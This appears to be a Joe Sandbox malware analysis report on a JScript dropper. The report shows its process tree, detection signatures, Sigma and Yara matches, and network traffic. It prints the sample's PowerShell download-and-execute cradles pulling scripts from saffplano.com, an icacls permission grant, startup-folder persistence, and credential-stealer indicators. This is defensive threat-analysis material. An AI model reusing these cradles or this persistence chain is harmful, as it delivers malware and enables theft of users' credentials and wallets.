Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OPRfEWLTto.js

Overview

General Information

Sample name:OPRfEWLTto.js
Analysis ID:1582880
MD5:f69c68eb41778706eeb1c8565c763e55
SHA1:4d17cd5f16a7628856aa62f6beabc01d5c57a772
SHA256:d73b9b95b0285ef913ed8173d2539e2df8599181f3ebf20dcb427a0a15e2702d
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
PE file contains section with special chars
Powershell creates an autostart link
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 8188 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 7204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 6420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "iex (iwr https://saffplano.com/download/uploads/KciVS6w55td9u.txt -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • WmiPrvSE.exe (PID: 8264 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • icacls.exe (PID: 8396 cmdline: "C:\Windows\system32\icacls.exe" C:\Users\user\AppData\Roaming\App_86026 "/grant Everyone:F" /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • visionApps.exe (PID: 8464 cmdline: "C:\Users\user\AppData\Roaming\App_86026\visionApps.exe" MD5: A9BCDEE7DAD18ADC545C4003B77A2D62)
  • visionApps.exe (PID: 8632 cmdline: "C:\Users\user\AppData\Roaming\App_86026\visionApps.exe" MD5: A9BCDEE7DAD18ADC545C4003B77A2D62)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6420INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2e9900:$b2: ::FromBase64String(
  • 0x2ee200:$b2: ::FromBase64String(
  • 0x2e9a1e:$b3: ::UTF8.GetString(
  • 0x2ee31e:$b3: ::UTF8.GetString(
  • 0xf4429:$s1: -join
  • 0xf4d24:$s1: -join
  • 0x153f97:$s1: -join
  • 0x2014c2:$s1: -join
  • 0x20e597:$s1: -join
  • 0x211969:$s1: -join
  • 0x21201b:$s1: -join
  • 0x213b0c:$s1: -join
  • 0x215d12:$s1: -join
  • 0x216539:$s1: -join
  • 0x216da9:$s1: -join
  • 0x2174e4:$s1: -join
  • 0x217516:$s1: -join
  • 0x21755e:$s1: -join
  • 0x21757d:$s1: -join
  • 0x217dcd:$s1: -join
  • 0x217f49:$s1: -join
Process Memory Space: visionApps.exe PID: 8464JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: visionApps.exe PID: 8464JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: visionApps.exe PID: 8632JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_7204.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xc2af:$b2: ::FromBase64String(
        • 0xc3cf:$b3: ::UTF8.GetString(
        • 0xb8ec:$s1: -join
        • 0x5098:$s4: +=
        • 0x515a:$s4: +=
        • 0x9381:$s4: +=
        • 0xb49e:$s4: +=
        • 0xb788:$s4: +=
        • 0xb8ce:$s4: +=
        • 0x1c627:$s4: +=
        • 0x1c6a7:$s4: +=
        • 0x1c76d:$s4: +=
        • 0x1c7ed:$s4: +=
        • 0x1c9c3:$s4: +=
        • 0x1ca47:$s4: +=
        • 0xc59c:$e4: Start-Process
        • 0x1d1c5:$e4: Get-WmiObject
        • 0x1d3b4:$e4: Get-Process
        • 0x1d40c:$e4: Start-Process
        amsi64_6420.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xcdd6:$b2: ::FromBase64String(
        • 0xcef6:$b3: ::UTF8.GetString(
        • 0xb8eb:$s1: -join
        • 0x5097:$s4: +=
        • 0x5159:$s4: +=
        • 0x9380:$s4: +=
        • 0xb49d:$s4: +=
        • 0xb787:$s4: +=
        • 0xb8cd:$s4: +=
        • 0x1d9c6:$s4: +=
        • 0x1da46:$s4: +=
        • 0x1db0c:$s4: +=
        • 0x1db8c:$s4: +=
        • 0x1dd62:$s4: +=
        • 0x1dde6:$s4: +=
        • 0x6bedd:$s4: +=
        • 0x70986:$s4: +=
        • 0x70a06:$s4: +=
        • 0x70acc:$s4: +=
        • 0x70b4c:$s4: +=
        • 0x70d22:$s4: +=

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
        Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6420, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\app.lnk
        Sigma detected: PowerShell Download and Execution Cradles
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8188, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", ProcessId: 7204, ProcessName: powershell.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5036, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", ProcessId: 8188, ProcessName: wscript.exe
        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6420, TargetFilename: C:\Users\user\AppData\Roaming\App_86026\visionApps.exe
        Sigma detected: PowerShell Web Download
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8188, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", ProcessId: 7204, ProcessName: powershell.exe
        Sigma detected: Startup Folder File Write
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6420, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\app.lnk
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8188, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", ProcessId: 7204, ProcessName: powershell.exe
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5036, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", ProcessId: 8188, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OPRfEWLTto.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8188, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content ", ProcessId: 7204, ProcessName: powershell.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-31T18:00:00.568315+010028032742Potentially Bad Traffic192.168.11.2049715104.21.75.126443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-31T17:59:47.059450+010018100001Potentially Bad Traffic192.168.11.2049713104.21.75.126443TCP
        2024-12-31T17:59:57.492313+010018100001Potentially Bad Traffic192.168.11.2049714104.21.75.126443TCP
        2024-12-31T18:00:00.568315+010018100001Potentially Bad Traffic192.168.11.2049715104.21.75.126443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeReversingLabs: Detection: 65%
        Multi AV Scanner detection for submitted file
        Source: OPRfEWLTto.jsReversingLabs: Detection: 26%
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 104.21.75.126:443 -> 192.168.11.20:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.75.126:443 -> 192.168.11.20:49714 version: TLS 1.2
        Source: Binary string: T.pDbW source: visionApps.exe, 0000000A.00000002.2939028613.0000000001CA2000.00000040.00000001.01000000.00000008.sdmp, visionApps.exe, 0000000D.00000002.1975245958.0000000001CA2000.00000040.00000001.01000000.00000008.sdmp
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49715 -> 104.21.75.126:443
        Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49713 -> 104.21.75.126:443
        Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49714 -> 104.21.75.126:443
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49715 -> 104.21.75.126:443
        Source: global trafficHTTP traffic detected: GET /download/uploads/eERu1UrKpkUv.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: saffplano.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download/uploads/KciVS6w55td9u.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: saffplano.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /fsp/visionApps.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: saffplano.com
        Source: global trafficHTTP traffic detected: POST /fsp/contador/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Content-Type: application/jsonHost: saffplano.comContent-Length: 57
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /download/uploads/eERu1UrKpkUv.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: saffplano.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download/uploads/KciVS6w55td9u.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: saffplano.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /fsp/visionApps.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: saffplano.com
        Source: global trafficDNS traffic detected: DNS query: saffplano.com
        Source: unknownHTTP traffic detected: POST /fsp/contador/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Content-Type: application/jsonHost: saffplano.comContent-Length: 57
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: powershell.exe, 00000006.00000002.1907146380.00000235F07FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: powershell.exe, 00000006.00000002.1907146380.00000235F0780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 00000006.00000002.1910671628.00000235F0B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.96
        Source: powershell.exe, 00000006.00000002.1907146380.00000235F082C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.co
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia
        Source: powershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://ocsp.digicert.com0X
        Source: powershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://pki-crl.symauth.com/ca_7a5c3a0c73117406add19312bc1bc23f/LatestCRL.crl07
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://pki-ocsp.symauth.com0
        Source: powershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000006.00000002.1879594049.0000023580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
        Source: visionApps.exe, 0000000A.00000003.1868471357.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000A.00000002.2944884298.00000000045EE000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000A.00000002.2937512778.0000000000B61000.00000020.00000001.01000000.00000008.sdmp, visionApps.exe, 0000000D.00000002.1983473944.000000000503E000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000003.1952759401.0000000003350000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1972511676.0000000000B61000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.indyproject.org/
        Source: powershell.exe, 00000006.00000002.1907146380.00000235F07FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: powershell.exe, 00000006.00000002.1879594049.0000023580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
        Source: powershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000006.00000002.1907146380.00000235F07FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: powershell.exe, 00000006.00000002.1879594049.0000023580E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://saffplano.com
        Source: powershell.exe, 00000006.00000002.1904197026.00000235EE739000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1910948296.00000235F0FCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1907146380.00000235F07EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1909691867.00000235F0A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saffplano.com/download/uploads/KciVS6w55td9u.txt
        Source: wscript.exe, wscript.exe, 00000000.00000002.1634851755.0000014E08090000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1634780078.0000014E068E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saffplano.com/download/uploads/eERu
        Source: wscript.exe, 00000000.00000002.1634455875.0000014E06527000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1634455875.0000014E064DE000.00000004.00000020.00020000.00000000.sdmp, OPRfEWLTto.jsString found in binary or memory: https://saffplano.com/download/uploads/eERu1UrKpkUv.txt
        Source: powershell.exe, 00000006.00000002.1904197026.00000235EE730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://saffplano.com/download/uploads/kcivs6w55td9u.txt
        Source: powershell.exe, 00000006.00000002.1879594049.0000023580E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://saffplano.com/fsp/contador/
        Source: powershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://saffplano.com/fsp/contador/Xz
        Source: powershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://saffplano.com/fsp/visionApps.zip
